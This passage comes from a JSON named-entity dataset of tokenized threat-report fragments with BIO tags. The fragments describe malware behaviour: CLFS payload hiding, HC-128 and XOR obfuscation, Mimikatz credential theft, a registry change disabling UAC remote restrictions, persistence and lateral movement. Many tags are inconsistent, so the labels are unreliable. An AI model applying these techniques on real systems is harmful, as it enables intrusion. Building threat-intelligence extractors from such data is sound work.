"for", - "further", - "actions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upon", - "opening", - "the", - "malicious", - "document" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "obfuscated", - "VBA", - "macro" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "Windows", - "Registry", - "or", - "NTFS", - "Extended", - "Attributes", - "to", - "hide", - "their", - "data," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hide", - "a", - "second", - "stage", - "payload", - "in", - "registry", - "transaction", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "perform", - "a", - "number", - "of", - "changes", - "on", - "the", - "filesystem", - "or", - "registry," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "store", - "and", - "retrieve", - "binary", - "data", - "with", - "the", - "Windows", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "provides", - "applications", - "with", - "API", - "functions—available" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "accessible", - "through", - "API", - "functions." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "opened", - "with", - "the", - "CreateLogFile()", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "clfsw32.dll", - "API", - "function" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "function", - "is", - "patched", - "using", - "Microsoft", - "Detours—a", - "publicly", - "available", - "library", - "used", - "for", - "instrumenting", - "Win32", - "functions—so" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "resolves", - "the", - "function", - "address", - "for", - "the", - "ServiceMain", - "export", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "the", - "API", - "CreateFileTransactedA()" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "the", - "API", - "NtCreateSection()" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "Obfuscation" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "most", - "of", - "the", - "strings", - "used", - "by", - "PRIVATELOG", - "and", - "STASHLOG", - "are", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "each", - "string", - "is", - "therefore", - "encrypted", - "with", - "a", - "unique", - "byte", - "stream." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "relies", - "on", - "XOR’ing", - "each", - "byte", - "with", - "a", - "hard-coded" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "control", - "flow", - "obfuscation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "addition", - "to", - "containing", - "obfuscated", - "strings,", - "the", - "installer’s", - "code", - "is", - "protected", - "using", - "various", - "control", - "flow", - "obfuscation", - "techniques", - "that", - "make", - "static", - "analysis", - "cumbersome" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "installer", - "generates", - "and", - "prints", - "out", - "encryption", - "keys", - "that", - "the", - "actor", - "uses", - "to", - "pre-encrypt", - "the", - "payload", - "before", - "it", - "is", - "written", - "to", - "disk" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Following", - "the", - "payload", - "header,", - "the", - "malware", - "expects", - "blocks", - "of", - "encrypted", - "data", - "with", - "8-byte", - "headers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Each", - "block", - "is", - "then", - "re-encrypted", - "with", - "the", - "new", - "key", - "material", - "as", - "follows:", - "The", - "encryption", - "key", - "is", - "the", - "16-byte", - "GUID" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "encryption", - "algorithm", - "is", - "HC-128," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sample", - "string", - "deobfuscation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "some", - "of", - "the", - "deobfuscated", - "strings", - "from", - "the", - "installer", - "are", - "used", - "for", - "logging", - "error", - "messages", - "and" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "the", - "installer", - "opens", - "and", - "decrypts", - "the", - "contents", - "of", - "the", - "file", - "passed", - "as", - "an", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "file", - "contents" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "data", - "matches", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "decrypts", - "each", - "block", - "using", - "HC-128" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "payload", - "which", - "will", - "be", - "decrypted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "contents", - "are", - "decrypted", - "using", - "the", - "HC-128", - "encryption", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "key", - "and", - "IV", - "are", - "generated", - "using", - "the", - "same", - "unique", - "host", - "properties" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "only", - "decrypts", - "the", - "first", - "matching", - "block" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "payload", - "contents" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "file", - "that", - "should", - "be", - "hidden", - "in", - "a", - "CLFS", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "it", - "searches", - "for", - ".blf", - "files", - "in", - "the", - "default", - "user’s", - "profile", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "starts", - "by", - "enumerating", - "*.blf", - "files", - "in", - "the", - "default", - "user’s", - "profile", - "directory" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "also", - "checks", - "that", - "the", - "operating", - "system", - "version" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "injection", - "process" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "example,", - "to", - "open", - "a", - "registry", - "key", - "in", - "a", - "transaction,", - "the", - "functions", - "RegCreateKeyTransacted(),", - "RegOpenKeyTransacted(),", - "and", - "RegDeleteKeyTransacted()", - "are", - "available." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "GUID", - "returned", - "from", - "the", - "registry", - "value" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "to", - "steal", - "credentials", - "from", - "host", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Uses", - "Mimikatz", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "them", - "locally." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "decrypted," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "begins", - "to", - "decrypt", - "and", - "parse", - "its", - "embedded", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "the", - "rest", - "of", - "the", - "blob", - "once", - "it", - "has", - "been", - "decoded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "REvil", - "configuration", - "has", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypted", - "REvil", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "Ransom", - "Cartel", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "they", - "are", - "written", - "to", - "the", - "registry," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "is", - "written", - "to", - "the", - "registry", - "key", - "SOFTWARE\\\\Google_Authenticator\\\\b52dKMhj," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "data", - "has", - "been", - "written", - "to", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "within", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Modifies", - "the", - "Registry", - "to", - "disable", - "UAC", - "remote", - "restrictions", - "by", - "setting", - "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", - "to", - "1." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "first", - "checks", - "to", - "see", - "if", - "the", - "registry", - "already", - "contains", - "previously", - "generated", - "values;", - "if", - "so,", - "it", - "will", - "read", - "those", - "values", - "into", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command", - "line", - "provided", - "to", - "the", - "ransomware", - "is", - "parsed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Uses", - "cmd.exe", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "disable", - "UAC", - "remote", - "restrictions", - "by", - "setting", - "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", - "to", - "1." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Adds", - "registry", - "run", - "keys", - "to", - "achieve", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "and", - "install", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "retrieve", - "the", - "malicious", - "payload", - "and", - "download", - "additional", - "resources" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Downloads", - "and", - "uploads", - "files", - "to", - "and", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "tool", - "downloads", - "the", - "files" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "legitimate", - "VPN,", - "RDP,", - "Citrix", - "or", - "VNC", - "credentials", - "to", - "maintain", - "access", - "to", - "an", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deploys", - "PDQ", - "Inventory", - "Scanner", - "tool." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "cracked", - "version", - "of", - "a", - "legitimate", - "tool", - "called", - "PDQ", - "Inventory,", - "which", - "is", - "a", - "legitimate", - "system", - "management", - "solution", - "that", - "IT", - "administrators", - "use", - "to", - "scan", - "their", - "network", - "and", - "collect", - "hardware,", - "software", - "and", - "Windows", - "configuration", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "enable", - "offline", - "password", - "cracking." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "Rundll32", - "to", - "load", - "and", - "execute", - "malicious", - "DLL." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ransomware", - "will", - "proceed", - "to", - "spawn", - "another", - "instance", - "of", - "itself", - "via", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Deletes", - "some", - "of", - "its", - "files", - "used", - "during", - "operations", - "as", - "part", - "of", - "cleanup,", - "including", - "removing", - "applications", - "such", - "as", - "7z.exe,", - "tor.exe,", - "ssh.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Uses", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "utilizing", - "string", - "encryption" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "configuration" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "base64-encoded", - "ransom", - "note," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "configuration", - "is", - "stored", - "as", - "a", - "base64-encoded", - "blob,", - "whereby", - "the", - "first", - "16", - "bytes", - "of", - "the", - "base64-encoded", - "blob", - "is", - "the", - "RC4", - "key" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "opts", - "to", - "obfuscate", - "their", - "ransomware", - "much", - "more", - "heavily" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Searches", - "for", - "specific", - "files", - "prior", - "to", - "encryption." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "seeks", - "out", - "files", - "with", - "the", - "following", - "file", - "extensions:", - ".log,", - ".vmdk,", - ".vmem,", - ".vswp", - "and", - ".vmsn." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Target", - "specific", - "file", - "path" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "search", - "machines", - "for", - "certain", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "AnyDesk", - "to", - "remotely", - "connect", - "and", - "transfer", - "files." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "used", - "this", - "as", - "a", - "remote", - "access", - "tool", - "to", - "establish", - "an", - "interactive", - "command", - "and", - "control", - "channel" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Routes", - "traffic", - "over", - "TOR", - "and", - "VPN", - "servers", - "to", - "obfuscate", - "their", - "activities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "TOR", - "sites", - "redirecting", - "to", - "a", - "new", - "ransomware", - "operation" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "API", - "hashing" - ], - "ner_tags": [ - "B-SecTeam", - "B-SecTeam" - ] - }, - { - "tokens": [ - "the", - "username" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "computer", - "name,", - "domain", - "name,", - "locale", - "and", - "product", - "name." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leads", - "to", - "a", - "function", - "that", - "iterates", - "over", - "a", - "call" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "the", - "batch", - "file," - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "a", - "batch", - "script", - "used" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "batch", - "files" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "new", - "batch", - "file,", - "localdisk.bat,", - "was", - "also", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "discovery", - "actions", - "were", - "completed", - "several", - "times", - "again", - "in", - "other", - "various", - "batch", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "was", - "executed", - "using", - "a", - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "batch", - "file." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "execution", - "of", - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "eyewear.bat", - "then", - "executed", - "two", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "enter", - "this", - "directly", - "in", - "the", - "host", - "OS", - "command", - "shell." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - ":\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "invoked", - "from", - "the", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Another", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leveraged", - "by", - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\System32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "dropped", - "several", - "batch", - "scripts", - "on", - "the", - "server:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "installed", - "Atera", - "and", - "Splashtop", - "remote", - "access", - "software" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "then", - "repeated", - "the", - "install", - "of", - "the", - "remote", - "access", - "software", - "package." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "installed", - "RSAT", - "(Remote", - "Server", - "Administration", - "Tools)", - "on", - "the", - "beachhead", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AnyDesk", - "was", - "used", - "to", - "move", - "laterally", - "between", - "a", - "workstation", - "and", - "a", - "backup", - "server" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "three", - "different", - "Remote", - "Access", - "Software", - "were", - "used", - "by", - "the", - "threat", - "actor" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "used", - "three", - "different", - "tools", - "in", - "order", - "to", - "establish", - "an", - "interactive", - "and", - "persistent", - "command", - "and", - "control", - "channel." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "installation", - "of", - "the", - "remote", - "management", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "began", - "their", - "first", - "lateral", - "movement", - "to", - "a", - "server", - "in", - "the", - "environment", - "by", - "copying", - "their", - "Cobalt", - "Strike", - "DLL", - "over", - "to", - "the", - "host", - "and", - "executing", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "moved", - "to", - "install", - 